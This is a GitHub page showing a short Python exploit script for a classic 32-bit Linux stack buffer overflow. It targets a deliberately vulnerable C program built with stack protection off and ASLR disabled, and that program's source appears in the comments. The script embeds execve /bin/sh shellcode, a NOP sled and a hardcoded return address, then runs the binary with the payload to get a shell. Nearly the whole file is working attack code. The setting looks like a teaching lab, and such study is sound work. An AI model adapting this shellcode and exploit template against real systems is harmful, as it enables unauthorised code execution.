-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathSimpleLinuxBufferOverflow.py
More file actions
46 lines (39 loc) · 2.02 KB
/
SimpleLinuxBufferOverflow.py
File metadata and controls
46 lines (39 loc) · 2.02 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/bin/python
from subprocess import call
#-----------------------------------------------------------------------------------------------#
# Exploit: Simple Linux 32-bit Buffer Overflow, C strcpy argv[1]. #
# OS: Tested in Ubuntu 12.04 i386 #
# #
# Author: Oraclox (Brandon ceja) #
#-----------------------------------------------------------------------------------------------#
# Vulnerable C code: #
#-----------------------------------------------------------------------------------------------#
# #include <stdio.h> #
# #include <string.h> #
# #
# int main(int argc, char* argv[]){ #
# char buf[256]; #
# strcpy(buf, argv[1]); #
# printf("Input:%s\n", buf); #
# return 0; #
# } #
#-----------------------------------------------------------------------------------------------#
# Compiled with: gcc -g -fno-stack-protector -z execstack -o vuln vuln.c #
# ASRL turned off: sysctl kernel.randomize_va_space = 0 #
#-----------------------------------------------------------------------------------------------#
#-----------------------------------------------------------------------------------------------#
# Shellcode: Linux/x86 execve /bin/sh shellcode 23 bytes #
# From: Hamza Megahed, http://shell-storm.org/shellcode/files/shellcode-827.php #
#-----------------------------------------------------------------------------------------------#
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
#-----------------------------------------------------------------------------------------------#
# Return address, EIP back to NOP's in buffer #
# EIP -> 0xbffff4e0 #
#-----------------------------------------------------------------------------------------------#
retAddr = "\xe0\xf4\xff\xbf"
evil = "\x90" * (268-len(shellcode)) + shellcode + retAddr
print("Executing vulnerable program...")
call(["./vuln", evil])